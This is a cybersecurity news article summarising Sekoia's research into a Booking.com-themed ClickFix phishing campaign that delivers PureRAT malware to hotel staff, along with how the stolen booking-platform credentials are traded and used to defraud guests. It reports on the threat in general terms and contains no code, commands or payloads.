Cybersecurity researchers have raised an alarm over a large-scale phishing campaign targeting the global hospitality industry, with hotel managers being tricked into visiting ClickFix-style phishing pages designed to steal their credentials and install the PureRAT malware.
According to Sekoia, the French cybersecurity firm that analyzed the operation, “The attacker’s modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments. This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT.”
The campaign’s primary objective is to harvest credentials from compromised systems, granting threat actors unauthorized access to platforms such as Booking.com and Expedia. These stolen credentials are later sold on cybercrime forums or used to impersonate hotels and defraud guests through fake reservation or payment verification messages.
Sekoia reported that the operation has been active since at least April 2025 and continues to target hotels across multiple countries. The phishing emails often appear to come from trusted sources, directing recipients to fake reCAPTCHA verification pages that lead to malicious scripts. These scripts then prompt victims to execute PowerShell commands that install a ZIP archive containing PureRAT (also known as zgRAT) via DLL side-loading.
Once deployed, PureRAT enables remote access, keylogging, webcam and microphone capture, file exfiltration, and command execution. The malware is protected with .NET Reactor, making reverse engineering difficult, and maintains persistence using Windows registry keys.
Adding to the threat, attackers also contact hotel customers directly via WhatsApp or email, using real booking details to trick them into sharing bank card information on fake Booking.com or Expedia pages.
Sekoia noted that the attackers are sourcing admin data from criminal forums like LolzTeam, even hiring intermediaries, or “traffers,” to infect hotel systems. “Booking.com extranet accounts play a crucial role in fraudulent schemes targeting the hospitality industry,” Sekoia said. “Consequently, data harvested from these accounts has become a lucrative commodity, regularly offered for sale in illicit marketplaces.”
The firm also found evidence of Telegram bots and a threat actor named “moderator_booking” selling booking platform logs.
Further analysis by Push Security revealed that recent ClickFix phishing pages have evolved, now including embedded videos, countdown timers, and OS-specific instructions, significantly boosting their credibility. “ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering,” Push Security warned.
The findings highlight how cybercriminals are professionalizing phishing campaigns through “as-a-service” models—reducing entry barriers and maximizing profits from stolen hospitality data.
